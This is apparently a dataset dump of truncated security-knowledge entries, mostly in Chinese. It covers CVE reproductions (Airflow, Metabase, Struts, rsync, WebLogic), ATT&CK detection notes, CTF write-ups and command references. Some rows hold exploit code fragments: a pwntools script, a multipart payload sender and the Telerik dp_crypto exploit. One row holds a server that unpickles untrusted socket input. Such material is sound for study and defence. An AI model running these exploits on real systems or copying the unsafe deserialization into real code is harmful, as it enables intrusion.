text stringlengths 100 9.93M | category stringclasses 11
values |
|---|---|
# Apache Airflow 示例dag中的命令注入(CVE-2020-11978)
Apache Airflow是一款开源的,分布式任务调度框架。在其1.10.10版本及以前的示例DAG中存在一处命令注入漏洞,未授权的访问者可以通过这个漏洞在Worker中执行任意命令。
由于启动的组件比较多,可能会有点卡,运行此环境可能需要准备2G以上的内存。
参考链接:
- <https://lists.apache.org/thread/cn57zwylxsnzjyjztwqxpmly0x9q5ljx>
- <https://github.com/pberba/CVE-2020-11978>
## 漏洞环境
依次执行如下命令启... | sec-knowleage |
# T1222-001-win-文件权限修改
## 来自ATT&CK的描述
文件和目录权限通常由文件或目录所有者指定的任意访问控制列表(DACL)管理。文件和目录DACL的实现因平台而异,但通常会明确指定它们,以便用户/组可以执行操作,例如读取,写入,执行等。
攻击者可以修改文件或目录的权限或属性,以逃避预期的DACL。修改可能包括更改特定的访问权限,这可能需要获取文件或目录的所有权或提升的权限(例如Administrator/root),具体取决于文件或目录的现有权限以启用恶意活动,例如修改,替换或删除特定文件目录。特定文件和目录修改可能是许多技术所必需的步骤,例如,通过可访问性功能,登录脚本建立持久性,或污染、劫持其他工具二进制... | sec-knowleage |
from pwn import *
import re
import time
context.log_level = "DEBUG"
context.arch='amd64'
HOST = "localhost"
PORT = 1337
HOST = "pwn01.grandprix.whitehatvn.com"
PORT = 26129
r = remote(HOST,PORT)
data = r.recvuntil("name plzz ??")
base = re.findall(r"0x[0-9a-f]+",data)[0]
base = base[2:]
base = int(base,16) - 0x203... | sec-knowleage |
# 数据驱动安全入门概览
此内容是Nepnep成员 peony师傅的一次[每周分享](https://www.bilibili.com/video/av242765993?share_medium=android&share_source=qq&bbid=XY87FB98D9B5624227EFE69449AF69C1CD337&ts=1587305411490)[1]简单笔记,感谢师傅~
> “数据驱动安全的本质是一种高层次、跨学科的自动化手段,其内涵包括了数据分析、人工智能、大数据、云计算等等。数据分析技术作为一种重要的自动化手段,必然会消灭掉一部分简单、重复工作内容,进一步提高行业从业人员的进入门槛。在未来可以预期的很长一段时... | sec-knowleage |
rpmbuild
===
创建RPM的二进制软件包和源码软件包
## 补充说明
**rpmbuild命令** 被用于创建rpm的二进制软件包和源码软件包。
### 语法
```shell
rpmbuild(选项)
```
### 选项
```shell
--initdb:初始化RPM数据库;
--rebuilddb:从已安装的包头文件,方向重建RPM数据库;
-ba:创建二进制和源代码包;
-bb:创建二进制代码包;
-bs:创建源代码包。
```
### 实例
```shell
rpmbuild -ba 'spec文件路径'
```
build完后,可以在`/usr/src/redhat/RPMS/`下找到二进制rpm包,r... | sec-knowleage |
# 十、跨站脚本攻击
> 作者:Peter Yaworski
> 译者:[飞龙](https://github.com/)
> 协议:[CC BY-NC-SA 4.0](http://creativecommons.org/licenses/by-nc-sa/4.0/)
## 描述
跨站脚本,或者 XSS,涉及到站定包含非预期的 JavaScript 脚本代码,它随后传给用于,用户在浏览器中执行了该代码。它的一个无害示例为:
```js
alert('XSS');
```
这会调用 JavaScript 函数`alert`,并创建一个简单的弹出窗口,带有文本`XSS`。现在,在这本书的前一个版本中,我推荐你在报告中使用这个例子。但是... | sec-knowleage |
---
title: Redis
background: bg-[#c13b2c]
tags:
- cache
categories:
- Database
date: 2020-12-26 19:33:15
intro: |
This is a [redis](https://redis.io/) quick reference cheat sheet that lists examples of redis commands
plugins:
- copyCode
---
Getting Started
---------------
### Getting started
Start Redis... | sec-knowleage |
# T1587-002-开发能力-代码签名证书
## 来自ATT&CK的描述
攻击者可能会创建自签名代码签名证书,这些证书可在攻击目标期间使用。代码签名是对可执行文件和脚本进行数字签名以确认软件作者并保证代码未被更改或损坏的过程。代码签名为开发人员的程序提供了一定程度的真实性,并保证程序未被篡改。用户或安全工具可能比未签名的代码更信任签名的代码,即使他们不知道谁颁发了证书或作者是谁。
在代码签名之前,攻击者可能会开发自签名代码签名证书以用于操作。
## 测试案例
暂无,仅提供辅助理解案例:
恶意软件团伙盗取大量证书用来绕过代码签名检查
<https://www.anquanke.com/post/id/83654>
恶意病毒伪造微软... | sec-knowleage |
## p1ng (Forensics, 121p)
###ENG
[PL](#pl-version)
We are given interesting file, that looks like regular png file.

Though your browser may or may not support it. Because (surprise!) it's not regular png file - it's so called APNG file (animated png). After we discovered it (using tweakpng) we tried to un... | sec-knowleage |
# 网络钓鱼
## 简介
网络钓鱼是一种通过网络诈骗的手段获取用户的敏感信息(如银行卡号、密码、个人资料等)的恶意活动。它通常通过电子邮件、社交媒体或网站等方式进行,伪装成一些真实的机构或个人发送消息,诱导用户点击链接或提交信息。
钓鱼邮件可以是以紧急或关键信息为主题的,例如涉及银行卡挂失、在线账户紧急更新、中奖通知等。钓鱼链接可能会通过假冒的网站或登录页面收集用户的敏感信息。
鱼叉式网络钓鱼(Spear Phishing)是一种特殊的网络钓鱼技巧,旨在针对具体的个人或组织进行攻击,通过伪装为信任的人或组织发送恶意电子邮件,以获取敏感信息。它是一种更具破坏性的网络钓鱼方式,因为攻击者针对的是特定的目标,并利用从该目标获得的信息进行攻... | sec-knowleage |
logger
===
在系统日志中记录相应条目
## 补充说明
**logger命令** 是用于往系统中写入日志,他提供一个shell命令接口到syslog系统模块
### 语法
```shell
logger [options] [message]
```
### 选项
```shell
-T, --tcp 使用流连接(TCP)
-d, --udp 使用数据报(UDP)
-i, --id 逐行记录每一次logger的进程ID
-f, --file <file> 记录特定的文件
-h, --help 显示帮助文本并退... | sec-knowleage |
'\"
'\" Copyright (c) 1992 The Regents of the University of California.
'\" Copyright (c) 1994-1996 Sun Microsystems, Inc.
'\"
'\" See the file "license.terms" for information on usage and redistribution
'\" of this file, and for a DISCLAIMER OF ALL WARRANTIES.
'\"
'\" RCS: @(#) $Id: tk.n,v 1.2 2003/11/24 05:10:00 bbb... | sec-knowleage |
# rsync 未授权访问漏洞
rsync是Linux下一款数据备份工具,支持通过rsync协议、ssh协议进行远程文件传输。其中rsync协议默认监听873端口,如果目标开启了rsync服务,并且没有配置ACL或访问密码,我们将可以读写目标服务器文件。
## 漏洞测试
编译及运行rsync服务器:
```
docker compose build
docker compose up -d
```
环境启动后,我们用rsync命令访问之:
```
rsync rsync://your-ip:873/
```
可以查看模块名列表:

如上图,有一个src模块,我们再列出这个模块下的文件:
```... | sec-knowleage |
# digitalworld.local: MERCY v2
> https://download.vulnhub.com/digitalworld/MERCY-v2.zip
靶场IP:`192.168.111.158`
扫描对外IP地址
```
┌──(root💀kali)-[~]
└─# nmap -sV -p1-65535 192.168.111.158 ... | sec-knowleage |
# 第10章 赛后——分析报告
> 译者:[@Snowming](https://github.com/Snowming04)

在之前的 THP 书籍中,我们有介绍如何编写渗透测试报告的示例,并提供了大量报告模板。这些示例非常适合那些按部就班的做渗透测试的活动,但是不适合红队的活动。正如本书所述,红队的焦点不是识别漏洞本身(虽然这也是工作的一部分),而是测试人、工具、工作流程和员工的技能组合。如果你的公司被授权的渗透测试者或者未授权的坏人攻击并成功入侵,你会给自己的业绩打几分?我一直反对使用差距评估分数、ISO 分数、成熟度模型分数、标准风险分析、热度图和类似类型... | sec-knowleage |
# Thymeleaf
Thymeleaf 中的表达式有好几种
- 变量表达式: ${...}
- 选择变量表达式: *{...}
- 消息表达: #{...}
- 链接 URL 表达式: @{...}
- 片段表达式: ~{...}
## 片段表达式
片段表达式可以用于引用公共的目标片段比如 footer 或者 header
比如在 `/WEB-INF/templates/footer.html` 定义一个片段,名为 copy。 `<div th:fragment="copy">`
```html
<!DOCTYPE html>
<html xmlns:th="http://www.thymeleaf.org">
<body>... | sec-knowleage |
# Investigative Reversing 1
Forensics, 350 points
## Description:
> We have recovered a binary and a few images: image, image2, image3. See what you can make of it. There should be a flag somewhere.
## Solution:
This is the follow-up for [Investigative Reversing 0](Investigative_Reversing_0.md).
Again, let's check the... | sec-knowleage |
# 模拟诉求任务攻击
## 模拟任务:
拿到该公司明年计划,拿到该公司今年报表,并且摸清该公司组织架构。盈利情况。
### 1、主站 Shell
第一个shell为目标主站shell,为08 R2,提权后遂改变主意。由于是以APT为主,并不打算以主站权限为点渗透,动作太大。不利于长期跟踪。改变为搜集情报为主。配合下一步工作。

主站为2008 R2:

主站端口为:
协议允许客户端与服务端协商合适的认证方法,协议的实现上存在设计错误,远程攻击者可以绕过认证无需口令实现对服务器的访问。
## 影响范围
RealVNC <= 4.1.1
### 环境搭建
> win2003系统
下载地址:https://www.filesoul.com/software/RealVNC/4-1-1/download/
进行安装(一直下... | sec-knowleage |
### 填充方式概述
在分组加密中,明文的长度往往并不满足要求,需要进行 padding,而如何 padding 目前也已经有了不少的规定。
常见的 [填充规则]( https://www.di-mgt.com.au/cryptopad.html) 如下。**需要注意的是,即使消息的长度是块大小的整数倍,仍然需要填充。**
一般来说,如果在解密之后发现 Padding 不正确,则往往会抛出异常。我们也因此可以知道 Paddig 是否正确。
### Pad with bytes all of the same value as the number of padding bytes (PKCS5 padding)
举例子如下
```
... | sec-knowleage |
hping3
===
测试网络及主机的安全
## 补充说明
**hping** 是用于生成和解析TCPIP协议数据包的开源工具。创作者是Salvatore Sanfilippo。目前最新版是hping3,支持使用tcl脚本自动化地调用其API。hping是安全审计、防火墙测试等工作的标配工具。hping优势在于能够定制数据包的各个部分,因此用户可以灵活对目标机进行细致地探测。
### 安装
```shell
yum install libpcap-devel tc-devel
ln -s /usr/include/pcap-bpf.h /usr/include/net/bpf.h
wget http://www.hping.org... | sec-knowleage |
## Trace (RE, 4p)
follow the trace trace.log
update:
the flag is at 0x400D80
*(uint32_t*)0x00410EA0 == 0x400D80
###ENG
[PL](#pl-version)
We are given very long execution trace (list of opcodes executed by processor, in order) and want to get flag out of it.
It seems funny, because that was really interesting chall... | sec-knowleage |
<?php
/*
* Generated configuration file
* Generated by: phpMyAdmin 4.6.2 setup script
* Date: Mon, 07 May 2018 10:48:03 +0000
*/
/* Servers configuration */
$i = 0;
/* Server: mysql [1] */
$i++;
$cfg['Servers'][$i]['verbose'] = 'mysql';
$cfg['Servers'][$i]['host'] = 'mysql';
$cfg['Servers'][$i]['port'] = 3306;
$c... | sec-knowleage |
### NtQueryInformationProcess概述
``` c++
NTSTATUS WINAPI NtQueryInformationProcess(
_In_ HANDLE ProcessHandle,
_In_ PROCESSINFOCLASS ProcessInformationClass,
_Out_ PVOID ProcessInformation,
_In_ ULONG ProcessInformationLength,
_Out_opt_ PULONG Return... | sec-knowleage |
#!/usr/bin/env python3
from random import randrange
from Crypto.Cipher import AES
p = 2**128 - 33227
i = lambda x: pow(x, p-2, p)
def add(A, B):
(u, v), (w, x) = A, B
assert u != w or v == x
if u == w: m = (3*u*w + 4*u + 1) * i(v+x)
else: m = (x-v) * i(w-u)
y = m*m - u - w - 2
z = m*(u-y) - v... | sec-knowleage |
#Vsftpd dejavu (for, 150 points, solved by 20)
In this chall, we have to find a backdoor in modified openssh source.
After a while of diffing the code with the original, this piece got our attention:
```c++
#define SSH_CMSG_AUTH_TIS_RESPONSE "SSH_CMSG_AUTH_TIS_RESPONSE"
int ge25519_unpackneg_vartime(ge25519_p3 *r, con... | sec-knowleage |
.\" 中文版 Copyright (c) 2000 mhss 和 www.linuxforum.net
.TH TZSELECT 8
.SH NAME
tzselect \- 选择一个时区
.SH 总览
.B tzselect
.SH 描述
.B tzselect
程序向用户询问当前位置的信息,把时区描述作为结果输出到标准输出。
此结果适合作为环境变量 TZ 的值。
.PP
所有与用户的交互是通过标准输入和标准错误输出完成的。
.SH "环境变量"
.TP
\f3AWK\fP
一个 Posix 兼容的
.I awk
程序的名字(缺省:
.BR awk ).
.TP
\f3TZDIR\fP
包含时区数据文件的目录的名字 (缺省:
.... | sec-knowleage |
<!--
~ Licensed to the Apache Software Foundation (ASF) under one
~ or more contributor license agreements. See the NOTICE file
~ distributed with this work for additional information
~ regarding copyright ownership. The ASF licenses this file
~ to you under the Apache License, Version 2.0 (the
~ "License... | sec-knowleage |
# 整数溢出
## 介绍
在C语言中,整数的基本数据类型分为短整型(short),整型(int),长整型(long),这三个数据类型还分为有符号和无符号,每种数据类型都有各自的大小范围,(因为数据类型的大小范围是编译器决定的,所以之后所述都默认是 64 位下使用 gcc-5.4),如下所示:
| 类型 | 字节 | 范围 |
| :-: | :-: | :-: |
| short int | 2byte(word) | 0\~32767(0\~0x7fff) <br> -32768\~-1(0x8000\~0xffff) |
| unsigned short int | 2byte(word) | 0\~65535(0\~0xff... | sec-knowleage |
.\" auto-generated by docbook2man-spec $Revision: 1.1 $
.TH "PG_RESTORE" "1" "2003-11-02" "Application" "PostgreSQL Client Applications"
.SH NAME
pg_restore \- 从一个由 pg_dump 创建的备份文件中恢复 PostgreSQL 数据库。
.SH SYNOPSIS
.sp
\fBpg_restore\fR\fR [ \fR\fB\fIoption\fB\fR...\fB \fR\fR]\fR\fR [ \fR\fB\fIfilename\fB \fR\fR]\fR
.SH "... | sec-knowleage |
import sys
import socket
import ssl
import random
from urllib.parse import urlparse, ParseResult
PAYLOAD_MAX_LENGTH = 16384 - 200
def exploit(client, parts: ParseResult, payload: bytes):
path = '/' if not parts.path else parts.path
boundary = '----%s' % str(random.randint(1000000000000, 9999999999999))
p... | sec-knowleage |
getent
===
查询 DNS 名称服务器中的命名空间
## 语法
```shell
getent [选项] 主机名或域名
```
## 选项
```shell
-h # 显示帮助信息
-n # 不解析 DNS 名称
-p # 打印解析过程
-s # 只输出有关已知主机的信息
-t # 指定 DNS 查询类型 (默认为 NXDOMAIN)
-U # 使用顶级域名服务器
-V # 显示版本信息
-O # 以其他模式解析命名空间
```
主机名或域名可以是通配符 (例如 *.example.com) 或单个主机名。如果指定了 -h 选项,则显示帮助信息。如果指定了 -n 选项,则不再解... | sec-knowleage |
# Metabase未授权JDBC远程代码执行漏洞(CVE-2023-38646)
Metabase是一个开源的数据分析平台。在其0.46.6版本及以前,存在一处远程代码执行漏洞,未授权的用户可以使用JDBC注入在服务器上执行任意代码。
参考链接:
- <https://blog.assetnote.io/2023/07/22/pre-auth-rce-metabase/>
- <https://blog.calif.io/p/reproducing-cve-2023-38646-metabase>
- <https://mp.weixin.qq.com/s/MgfIyq0OJwnKOUF2kBB7TA>
## 漏洞环境
... | sec-knowleage |
---
title: Zoom
date: 2022-11-23 16:23:31.704621
background: bg-[#2858ee]
tags:
-
- mac
categories:
- Keyboard Shortcuts
intro: |
A visual cheat-sheet for the 32 keyboard shortcuts found in Zoom. These shortcuts are for MacOS, for Windows visit /zoom-windows.
---
Mac Keyboard Shortcuts {.cols-2}
----... | sec-knowleage |
# T1190-CVE-2018-2894-Weblogic任意文件上传检测
## 来自ATT&CK的描述
使用软件,数据或命令来利用面向Internet的计算机系统或程序中的弱点,从而导致意外或无法预期的行为。系统的弱点可能是错误、故障或设计漏洞。这些应用程序通常是网站,但是可以包括数据库(例如SQL),标准服务(例如SMB 或SSH)以及具有Internet可访问开放的任何其他应用程序,例如Web服务器和相关服务。根据所利用的缺陷,这可能包括“利用防御防卫”。
如果应用程序托管在基于云的基础架构上,则对其进行利用可能会导致基础实际应用受到损害。这可以使攻击者获得访问云API或利用弱身份和访问管理策略的路径。
对于网站和数据库,O... | sec-knowleage |
## wh1ter0se (crypto, 50p, 753 solves)
> Note: The flag is the entire thing decrypted
> [eps1.7_wh1ter0se_2b007cf0ba9881d954e85eb475d0d5e4.m4v](wh1ter0se.bin)
### PL Version
`for ENG version scroll down`
Pobieramy wskazany plik. Jego zawartość to:
EOY XF, AY VMU M UKFNY TOY YF UFWHYKAXZ EAZZHN. UFWHYKAXZ ZNMXPHN. U... | sec-knowleage |
# list0r (web 400)
###ENG
[PL](#pl-version)
In the task we get a webpage where user can create lists of things.
We quickly realise that it's possible to login as admin with any password and username `admin` and from this we get information that the flag is at `http://78.46.224.80/reeeaally/reallyy/c00l/and_aw3sme_flag`... | sec-knowleage |
# Model E1337 - Rolling Code Lock - FLAG0
## 0x00 Home

Tried couple of different code but all show errors.
```
Code incorrect. Expected 06947342
```
## 0x01 Directory
Try scan sub directory with Burp

And there is a comment in source code.
http://127.0.0.1/xxxxxxxxxx/admin
... | sec-knowleage |
# 导出表
DLL 通过导出表向外界提供导出函数名称,序号以及入口地址等信息。从导入角度来看,Windows 装载器完善 IAT 时就是通过 DLL 的导出表读取从其导入的函数的地址的。导出表通常存在于大多数 DLL 中,但在少数 EXE 文件中同样存在。
对于 DLL 里导出函数的调用,既可以通过函数名称,也可以通过函数在导出表的索引进行。Windows 装载器将与进程相关的 DLL 加载到虚拟地址空间后,会根据导入表中登记的与该 DLL 相关的名称或编号来遍历 DLL 的虚拟地址空间并查找导出表结构,从而确定该导出函数在虚拟地址空间中的起始地址 VA,并将该 VA 覆盖写入 IAT 对应项处。
## EAT
`DataDirec... | sec-knowleage |
# 趋势报告
本报告模板从**安全态势**、 **风险趋势**、**应对方案**以及**监管状态**的角度出发,描述安全事件总体趋势的分析方向及相应方法。
本报告主要参考了[《2019云安全趋势报告》](https://www.freebuf.com/articles/paper/211311.html),仅作学习使用,若有侵权,劳请联系修改。
## 1. 概况
当前情况下针对主体来说,安全事件治理的战略意义、攻击趋势(简略)、发展方向。
## 2. 安全态势
”安全态势“用于总体地描述针对主体的威胁趋势。
### 从网络安全态势感知模型入手
针对主体的安全态势感知模型,可以帮助其进行系统的梳理,不精确但系统、完整。

## 0x01 Login
Tried login with admin/admin but shows **Invalid Password**.
Also tried to run a wordlist against the password. Still cannot log in.

## 0x02 Submit Ticket
The only thing can be done here is to submit a ticket.
A... | sec-knowleage |
.TH OPEN 2 1999-06-03 "Linux" "System calls"
.SH NAME
open, creat \- 打开和/或创建一个文件
.SH SYNOPSIS 总览
.nf
.B #include <sys/types.h>
.B #include <sys/stat.h>
.B #include <fcntl.h>
.sp
.BI "int open(const char *" pathname ", int " flags );
.BI "int open(const char *" pathname ", int " flags ", mode_t " mode )
.BI "int creat(c... | sec-knowleage |
# MockingBird
- https://github.com/babysor/MockingBird
---
**安装 ffmpeg**
```bash
brew install ffmpeg
```
**配置镜像源**
```bash
conda config --add channels https://mirrors.tuna.tsinghua.edu.cn/anaconda/pkgs/free/
conda config --add channels https://mirrors.tuna.tsinghua.edu.cn/anaconda/pkgs/main/
conda config --add channels... | sec-knowleage |
# Author: Paul Taylor / @bao7uo
# https://github.com/bao7uo/dp_crypto/blob/master/dp_crypto.py
# dp_crypto - CVE-2017-9248 exploit
# Telerik.Web.UI.dll Cryptographic compromise
# Warning - no cert warnings,
# and verify = False in code below prevents verification
import sys
import base64
import requests
import re
i... | sec-knowleage |
#!/usr/bin/python
import os
import pickle
import time
import socket
import signal
signal.signal(signal.SIGCHLD, signal.SIG_IGN)
def server(skt):
line = skt.recv(1024)
obj = pickle.loads(line)
for i in obj:
clnt.send("why did you send me " + i + "?\n")
skt = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0... | sec-knowleage |
depmod
===
分析可载入模块的相依性
## 补充说明
**depmod命令** 可产生模块依赖的映射文件,在构建嵌入式系统时,需要由这个命令来生成相应的文件,由modprobe使用。
### 语法
```shell
depmod(选项)
```
### 选项
```shell
-a或--all:分析所有可用的模块;
-d或debug:执行排错模式;
-e:输出无法参照的符号;
-i:不检查符号表的版本;
-m<文件>或system-map<文件>:使用指定的符号表文件;
-s或--system-log:在系统记录中记录错误;
-v或--verbose:执行时显示详细的信息;
-V或--version:显示版本信息;
--... | sec-knowleage |
# Perfect secrecy (crypto 158p, 74 solved)
In the task we get the [source code](challenge.py) of the server application, [encrypted flag](flag.txt) and RSA [public key](key_pub.pem).
The important part is just:
```python
m0 = reader.read(1)
m1 = reader.read(1)
ciphertext = reader.read(private_key.public_key... | sec-knowleage |
# T1078-003-windows-多账户同时登陆
## 来自ATT&CK的描述
攻击者可能会获取并滥用本地帐户的凭据,获取初始访问权限,持久性,权限提升或防御逃避。本地帐户是由组织配置的帐户,供用户远程支持,服务使用或在单个系统或服务上进行管理。
通过OS凭据转储,本地帐户也可能被滥用以提升特权和收集凭据。为了特权升级和横向移动,密码重用允许滥用网络上的一组计算机上的本地帐户。
## 测试案例
多个用户同时或者在同一小时内登录到同一台计算机上,通常不会出现在我们观察到的网络中。
登录事件是适用于Windows Vista及更高版本的Windows,适用于Vista之后的版本,登陆事件ID为4624。适用于Vista之前的版本,... | sec-knowleage |
# S2-052 Remote Code Execution Vulnerablity
[中文版本(Chinese version)](README.zh-cn.md)
Affected Version: Struts 2.1.2 - Struts 2.3.33, Struts 2.5 - Struts 2.5.12
Details:
- http://struts.apache.org/docs/s2-052.html
- https://yq.aliyun.com/articles/197926
## Setup
```
docker compose up -d
```
## Exploit
After la... | sec-knowleage |
from Crypto.Cipher import AES
from SocketServer import ThreadingMixIn
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
import sys
class Hasher:
def __init__(self):
self.aes = AES.new('\x00'*16)
def reset(self):
self.state = '\x00'*16
def ingest(self, block):
"""Ingest a block of 10 cha... | sec-knowleage |
#include <cstdio>
#include <cstdlib>
#include <cmath>
float weights[128][128][2][2];
int perm[128];
int rots[128];
int newperm[128];
int newrots[128];
int rnd(int l, int r) {
return l + rand() % (r - l + 1);
}
double rnd() {
return rand() / (float(RAND_MAX));
}
int main() {
freopen("/tmp/spec", "r", stdin);
in... | sec-knowleage |
## Robots (misc)
###ENG
[PL](#pl-version)
We get netcat address where we can play a game after connecting.
The game was: https://en.wikipedia.org/wiki/Robots_%28computer_game%29
The goal of the game was to avoid robots chasing our character and cause them to crash into each other.
After winning the game we get the abil... | sec-knowleage |
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'cve201914234.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise I... | sec-knowleage |
.\" Copyright (c) 1998 The NetBSD Foundation, Inc.
.\" All rights reserved.
.\"
.\" This documentation is derived from software contributed to The NetBSD
.\" Foundation by Matthias Scheler.
.\"
.\" Redistribution and use in source and binary forms, with or without
.\" modification, are permitted provided that the follo... | sec-knowleage |
# MIPS
## MIPS 基础内容
这里以 MIPS32 为基础作为介绍内容。
## 0x01 寄存器
### (1)通用寄存器
MIPS 有 32 个通用寄存器 (General purpose registers),以美元符号 (`$`) 表示。可以表示为 `$0~$31`,也可以用寄存器名称表示如,`$sp` 、 `$t9` 、`$fp` 等等。
| Register Number | Conventional Name | Usage | Usage ... | sec-knowleage |
version: '3.5'
services:
oap:
image: vulhub/skywalking:8.3.0
command: bash bin/oap-service.sh
web:
image: vulhub/skywalking:8.3.0
command: bash bin/web-server.sh
depends_on:
- oap
ports:
- 8080:8080
environment:
COLLECTOR_RIBBON_LISTOFSERVERS: oap:12800 | sec-knowleage |
require 'json'
def extgcd(a,b)
return [1,0] if b == 0
y,x = extgcd(b, a % b)
y -= (a/b)*x
return [x,y]
end
def mod_inverse(a, mod)
x,y = extgcd(a, mod)
return x % mod
end
def check_prime(p, count = nil)
return true if [2,3].include?(p)
return false if p.even? || p < 2
d, s = p - 1, 0
d, s = d >>... | sec-knowleage |
## The hidden message (Misc, 50p)
My friend really can't remember passwords. So he uses some kind of obfuscation. Can you
restore the plaintext?
###ENG
[PL](#pl-version)
This was a really trivial task. Given text consisted of base-8 numbers, which interpreted as
ASCII yielded base64-encoded string. Reversing the enco... | sec-knowleage |
## **********漏洞
> *****发表于2015年03月11日
### 漏洞描述
### 影响范围
### 漏洞详情
#### 漏洞位置
#### 漏洞触发条件
#### 漏洞原理
### poc/exp
### 漏洞修复建议 | sec-knowleage |
## 网络应用
|Web Applications||||||
|:-:|:-:|:-:|:-:|:-:|:-:|
|[apache-users](apache-users.md)|Arachni|BBQSQL|BlindElephant|[Burp Suite](BurpSuite.md)|CutyCapt|
|DAVTest|deblaze|DIRB|DirBuster|fimap|FunkLoad|
|Gobuster|Grabber|jboss-autopwn|joomscan|jSQL|Maltego Teeth|
|PadBuster|Paros|Parsero|plecost|Powerfuzzer|ProxyStri... | sec-knowleage |
# T1059-win-基于白名单Certutil.exe执行Payload
## 来自ATT&CK的描述
暂无合适分类,置放在此TID中
命令行界面是与计算机系统交互的一种方式,并且是很多操作系统平台的常见特性。例如,Windows系统上的命令行界面cmd可用于执行许多任务,包括执行其他软件。命令行界面可在本地交互或者通过远程桌面应用、反向shell会话等远程交互。执行的命令以命令行界面进程的当前权限级别运行,除非该命令需要调用进程来更改权限上下文(例如,定时任务)。
攻击者可能会使用命令行界面与系统交互并在操作过程中执行其他软件。
## 测试案例
Certutil.exe是作为证书服务的一部分安装的命令行程序。 我们可以使用此工... | sec-knowleage |
// +--+ ummmfpu
// +--+ Teaser Dragon CTF 2019
// +--+ by Gynvael Coldwind
// +--+ HF GL!
//
// Arduino UNO uM-FPU (PDIP-18)
// 13 (SCK) ----- (SCLK) 16
// 11 (MOSI) ----- (SIN) 12
// 12 (MISO) ----- (SOUT) 11
// 7 (input) ----- (SOUT) 11
//
#include <SPI.h>
#include <Fpu.h>
... | sec-knowleage |
# hevc (Misc, 50pts, 217 solves)
Welcome to the future.
This task was pretty simple if you notice its title. It turns out `hevc` is the name
of a pretty new video file format. With some googling, I was able to find
command converting it to other, more standard ones:
```
ffmpeg -i out.raw asd.avi
```
The video turns ou... | sec-knowleage |
# Jira Common Bugs
## Introduction
What would you do if you came across a website that uses Jira?
## How to Detect
Try to HTTP request to `https://example.com/secure/Dashboard.jspa` or `https://example.com/login.jsp` and there is a form login
1. Find the related CVE by checking jira version
* How to find the jira versi... | sec-knowleage |
# mysql
---
## my.cnf 配置文件
```bash
port = 3309
socket = /usr/local/mysql/tmp/mysql.sock
[mysqld] # 服务器端配置
!include /usr/local/mysql/etc/mysqld.cnf # 包含的配置文件,可以把用户名和密码文件单独存放
port = 3306 # 监听端口
bind-address = 0.0.0.0 # 监听的 ip 地址 (全0是监听所有网口,即对外开放,不建议⚠❗)
server-id = 1 #... | sec-knowleage |
# 漏洞管理
计算机安全隐患(vulnerability)俗称漏洞(security hole),指计算机系统安全方面的缺陷,使得系统或其它应用数据的保密性、完整性、可用性、访问控制和监测机制等面临威胁。
漏洞管理就是领先漏洞一步,让修复更频繁更有效的一个过程。
当公司业务较少时,一个表格就可以处理完漏洞管理的流程。但是当业务系统增多,安全报告增大时就需要一个好的漏洞管理工具来进行管理。
**抛一个问题:安全测试团队到底应不应该为漏洞数量负责,如果需要负责,那么多好还是少好?**
## 漏洞生命周期管理
。从本质上讲,inetd可以只运行一个守护进程,该守护进程可以在需要时调用其它服务进程,从而减... | sec-knowleage |
---
title: 查看版本信息
---
## 查看版本信息
使用 `version` 命令可以查看 CF 的当前版本信息以及更新时间。
```bash
cf version
```
<Vssue />
<script>
export default {
mounted () {
this.$page.lastUpdated = "2022年9月7日"
}
}
</script> | sec-knowleage |
# T1592-001-收集目标组织主机信息-硬件信息
## 来自ATT&CK的描述
在入侵受害者之前,攻击者可能会收集有关受害者主机硬件的信息,这些信息可以在目标定位期间使用。有关硬件基础设施的信息可能包括各种详细信息,例如特定主机上的类型和版本,以及是否存在可能指示附加防御保护措施的其他组件(例如:卡/生物识别器,专用加密硬件等)。
攻击者可以通过各种方式收集此信息,例如通过[主动扫描](https://contribute.knowledge.qihoo.net/detail/technique/T1595)(例如:主机名,服务器旗标,用户代理字符串)、 [钓鱼](https://contribute.knowledge.qi... | sec-knowleage |
# N1 CTF 2018
Team: borysp, nazywam, eternal, chivay, shalom, ppr, pwn.m0d3, akrasuski1, msm, sasza
### Table of contents
* [Patience (re)](re_patience)
* [Mathgame (ppc)](ppc_mathgame)
* [rsa padding (crypto)](crypto_rsapadding) | sec-knowleage |
---
title: Chrome Developer Tools
date: 2022-11-23 16:23:31.696017
background: bg-[#c64d3e]
label:
tags:
-
-
categories:
- Keyboard Shortcuts
intro: |
A visual cheat-sheet for the 56 keyboard shortcuts found in Chrome's Developer Tools
---
Keyboard Shortcuts
------------------
### Opening DevTools
S... | sec-knowleage |
# GeoServer OGC Filter SQL Injection (CVE-2023-25157)
[中文版本(Chinese version)](README.zh-cn.md)
GeoServer is an open-source software server written in Java that provides the ability to view, edit, and share geospatial data. It is designed to be a flexible, efficient solution for distributing geospatial data from a var... | sec-knowleage |
'\"
'\" Copyright (c) 1993 The Regents of the University of California.
'\" Copyright (c) 1994-1996 Sun Microsystems, Inc.
'\"
'\" See the file "license.terms" for information on usage and redistribution
'\" of this file, and for a DISCLAIMER OF ALL WARRANTIES.
'\"
'\" RCS: @(#) $Id: foreach.n,v 1.2 2003/11/24 05:09:5... | sec-knowleage |
# Warmup (RE, 397p, 63 solved)
It's a classic reversing challenge.
We get a [binary](warmup), ELF x64, statically compiled.
In the strings we can see something resembling a permutated flag:
```asm
00000000004a171b db 0x4f ; 'O' ; DATA XREF=sub_4009d8+12
00000000004a171c ... | sec-knowleage |
## Dsa (Crypto, 333p)
###ENG
[PL](#pl-version)
We are given following python code - it is supposed to sign messages:
```python
#!/usr/bin/python
from hashlib import *
from Crypto.Util.number import *
from gmpy import *
import os
def param_gen():
q = getPrime(1024)
while True:
t = 2*getRandomRange(1, 2**... | sec-knowleage |
---
title: CF 使用答疑
---
## CF 使用答疑
在 CF 项目的 [Discussions](https://github.com/teamssix/cf/discussions) 板块里,我创建了一个答疑帖,如果你遇到和 CF 相关的使用问题,可以在这里提出,我会给出相应的解答,同时这里也汇总了之前一些人问过的一些问题。
CF 答疑帖地址:[github.com/teamssix/cf/discussions/250](https://github.com/teamssix/cf/discussions/250)
<Vssue />
<script>
export default {
mounted ... | sec-knowleage |
# Portfolio
Web, 150 points
## Description
> Check out my development portfolio! I'm just getting started, so don't be too mean :(
## Solution
We visit the attached site and see:
```html
<body>
<header>
<h1 align="center">Welcome to my dev portfolio!</h1>
<h3 align="center">check out my cool projects<... | sec-knowleage |
---
title: Terraform 初体验
---
